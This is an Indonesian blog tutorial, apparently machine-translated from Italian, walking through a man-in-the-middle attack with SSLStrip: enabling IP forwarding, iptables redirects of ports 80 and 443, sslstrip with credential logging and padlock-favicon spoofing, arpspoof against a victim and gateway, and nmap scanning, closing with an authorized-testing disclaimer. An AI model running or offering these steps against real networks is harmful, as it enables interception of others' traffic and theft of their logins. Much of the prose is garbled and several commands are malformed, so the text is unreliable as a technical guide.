Serangan MITM pada koneksi terenkripsi dengan SSLStrip
Oleh
chmood
Serangan Man In The Middle (MITM).
Sebuah serangan MITM adalah untuk berdiri di antara korban dan server bahwa korban ingin kontak, tidak mengendus dalam melewati di LAN paket sederhana, tetapi merupakan teknik yang lebih canggih: dalam Man serangan di Tengah, dilakukan dalam sehingga korban percaya bahwa server adalah komputer kita bukan server yang sah, sehingga setiap permintaan akan datang langsung ke kita, maka kita akan dapat membaca dengan benar, mengirimkannya ke server sebenarnya, mendapatkan tanggapan dan mengirim kembali ke pengguna. Keuntungan adalah bahwa Anda akan terus berlayar menyadari segala sesuatu seperti itu berlayar dengan aman di bidang ini kosong percaya bahwa untuk menavigasi, juga kita akan dapat mencegat lalu lintas melalui SSL / TLS (HTTPS misalnya), bagaimana ??
kita menganalisis secara rinci pengoperasian koneksi SSL: kontak pengguna server di bawah protokol aman dengan memulai fase jabat tangan (handshake) yang akan terdiri dalam pertukaran kunci untuk sambungan terenkripsi, koneksi tersebut dienkripsi dengan algoritma kunci ganda, yaitu di mana kunci hanya dapat mengenkripsi pesan dan kunci lain hanya menguraikan pesan dengan dienkripsi dengan kunci pertama. Klien (korban kami), kontak server, server merespon dengan kunci untuk mengenkripsi pesan, pengguna sekarang dapat menggunakan kunci yang untuk mengenkripsi permintaan HTTP dan mengirimkannya ke server, sekarang tidak ada satu tapi server akan tahu apa Ini berisi permintaan tersebut, karena kunci publik bisa mendapatkan siapa pun, tetapi kunci untuk mendekripsi pesan, kunci pribadi, hanya kehendak dan hanya server, maka kita akan memiliki koneksi aman untuk mencoba sniffing. Selain itu, klien, enkripsi permintaan, ia akan juga memasukkan kunci kedua untuk mengenkripsi pesan respon, sehingga ketika server akan memproses permintaan, respon akan cifrarne sehingga hanya klien dapat membacanya, juga tidak ada yang bisa memalsukan respons ini Sebagai satu-satunya kunci untuk melakukannya dienkripsi bersama dengan permintaan bahwa pengguna mengirimkan, kemudian bom-bukti dilindungi oleh kekuatan matematika.
tapi di sini datang keajaiban
dan jika kita menempatkan di tengah? Jika kita memalsukan koneksi dan membuat korban percaya bahwa penyerang adalah server yang sah: korban mengirimkan permintaan jabat tangan penyerang berpikir bahwa basisnya server yang sah, penyerang akan merespon dengan kunci yang valid untuk dirinya sendiri, klien akan mengenkripsi respon melampirkan kunci menikmati, tapi akan mengenkripsi semua dengan kunci dan bukan server penyerang. 1) korban akan berpikir untuk berkomunikasi dalam sambungan aman, yang sebenarnya aman, hanya itu dengan target yang salah. 2) penyerang dapat mendekripsi permintaan dan akan memiliki kunci untuk menciptakan respon yang valid untuk korban 3) penyerang akan membuat sambungan terenkripsi kedua dengan server yang sah 4) ripacchettizza permintaan dari pengguna dan mengirimkannya ke server 5) Server merespon dan mengirimkan penyerang respon 6) penyerang respon ripacchettizza dan mengirimkannya ke korban tidak akan melihat sesuatu yang aneh.
tapi bagaimana menciptakan situasi ?? Anda harus meletakkan tangan berat dalam perencanaan dan fottervi otak, atau Anda mengandalkan alal pap siap ahli besar SSL / TLS yang akan bangkit banyak pekerjaan kotor dari bawah kaki mereka, seperti dalam kasus Moxie Marlinspike, yang menciptakan alat yang didedikasikan untuk situasi ini.
Hal ini SSLStrip, dan mampu mencegat koneksi SSL melalui serangan pembajakan koneksi (serangan MITM yang telah kami menganalisis awal. SSLStrip memiliki operasi yang sangat sederhana, dan melakukan pekerjaan kotor untuk menjembatani antara vittiam dan server, atau untuk menerima permintaan, meneruskannya dan mengirim ulang rispsota, seperti akan proxy, dan jelas memberikan penyerang akses penuh ke isi sesi browsing korban. Alat ini ditulis dalam python dan Anda merasa terinstal pada Bayan Keamanan OS, sistem operasi pengujian penetrasi kami, dengan seluruh bagian yang ditujukan untuk mengendus dan teknik spoofing. ps. dalam hal bahwa beberapa perangkat lunak tidak terpasang, mencoba untuk menginstal paket sslstrip dan dsniff
apt-get install dsniff sslstrip
Nuri kemudian men-download dan menginstal itu (atau menggunakannya dalam hidup) Anda sudah akan memiliki semua yang Anda butuhkan.
Serangan
Kami mengirim kartu jaringan
modus forwarding
berjalan dengan perintah administrasi:
echo "1"> / proc / sys / net / ipv4 / ip_forward
Buka terminal dan pergi untuk melihat all'usage dari SSLStrip:
# SSLStrip h
SSLStrip 0,9 oleh Moxie Marlinspike
Penggunaan: sslstrip <Pilihan>
Pilihan:
w <filename>, --write = <nama file> Tentukan file log untuk (opsional).
p, hanya SSL entri Log --post. (Default)
-s, --ssl Log semua lalu lintas SSL ke dan dari server.
-a, --all Log semua SSL dan HTTP lalu lintas ke dan dari server.
l <port>, --listen = <port> Pelabuhan untuk mendengarkan pada (default 10000).
-f, --favicon Pengganti untuk mengunci favicon pada permintaan aman.
-k, --killsessions Bunuh sesi berlangsung.
h
Pilihan ini bisa berfungsi w untuk menyimpan output ke file mendengus, tetapi jika kita tidak menggunakan sslstrip akan memberi kita semua output pada terminal, maka kita dapat memilih jenis filter diterapkan antara p (hanya headers koneksi SSL ), -s (semua lalu lintas ssl) dan a (baik lalu lintas SSL yang lampu lalu lintas). -f bukannya memungkinkan kita untuk memalsukan favicon navigasi jika berlayar di bawah SSL, sehingga Anda melihat gembok di sebelah alamat, memimpin dia untuk berpikir bahwa sertifikat keamanan berlaku. Dan tentu saja l akan membantu kita untuk menentukan port yang akan SSLStrip untuk mendengarkan. Kemudian kami mengatur iptables untuk mengarahkan lalu lintas ke HTTP SSLStrip mengetik:
iptables-t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT -to-port 9000
Kami memulai SSLStrip, questavolta mengetik:
sslstrip -l 9000
N.B. 9000 Anda dapat mengganti dengan port lain yang Anda sukai, asalkan pengalihan iptables sslstrip yang dikonfigurasi dengan port yang sama ini
Kami selesai, kita hanya perlu memulai arpspoof untuk memaksa jaringan untuk mengarahkan lalu lintas ke mesin penyerang. Untuk melakukan hal ini kita membuka terminal lain
meninggalkan terbuka sebelumnya
Dan kita ketik di terminal baru:
arpspoof -i <antarmuka> t <targetIP> <GatewayIP>
Di mana ia akan menempatkan di tempat <targetIP> ip korban dan di tempat <GatewayIP> alamat router. jelas target IP dan router dapat menentukan mereka dengan scan lokal dengan nmap di LAN IP kisaran delal Anda
nmap 192.168.1.1-254
ps. Beberapa router memiliki ruang yang berbeda dari IP dan disesuaikan segalanya untuk kebutuhan Anda, seperti 192.168.0.1-254 dll Pada titik ini, script akan mulai bekerja sesuai dengan prosedur yang disebutkan di atas dengan menangkap akses data. Jika anda ingin mencegat SSL ltraffico, hanya mengatur iptables port 443 bukan 80
iptables-t nat -A PREROUTING -p tcp --destination-port 443 j REDIRECT -to-port 9001
Dan bersenang-senang dengan SSLStrip di pintu redirect baru.
sslstrip -a -f -l 9000 w /root/Desktop/sniff.log
1) arpspoof mengolok-olok korban menyebabkan dia untuk menghubungi penyerang untuk setiap permintaan, 2) / proc / sys / net / ipv4 / ip_forward akan dibentuk untuk menerima IP forwarding 3) iptables akan mendengarkan pada port 80 443 dan mengarahkan lalu lintas di pelabuhan lokal 9000 dan 9001 4) SSLStrip jika dimasukkan mendengarkan pada 9000 akan mencegat semua lampu lalu lintas, sedangkan 9001 semua lalu lintas dienkripsi Berharap kami juga bisa mengatur untuk iptables membajak kedua protokol pada port yang sama untuk mengelola semua dengan sesi unik SSLStrip, tapi saya pribadi lebih suka untuk mengelola secara terpisah. Bersenang-senang mencoba teknik pada komputer Anda sehingga Anda menyadari betapa berbahayanya adalah teknik ini, dan ingat bahwa arpspoof hanya bekerja di LAN Anda, kemudian serangan eksternal pertama harus digunakan untuk server DNS korban yang diarahkan domain tertentu untuk Anda, membunuh Anda untuk melakukan port forwarding, dan banyak gadget lainnya untuk fungsi serangan benar. Saya mengingatkan Anda bahwa artikel ini adalah untuk informasi saja dan hanya mencoba sistem dan lingkungan atau properti Anda atau Anda mendapat izin tertulis yang mengotorisasi pengujian teknik tersebut untuk mempelajari mereka dalam operasi atau untuk menguji untuk keselamatan. Blog ini, jaringan yang terkait dengan mereka dan anggota tim mereka yang bekerja di sana tidak bertanggung jawab atas penyalahgunaan teknik tersebut.
Category
Komentar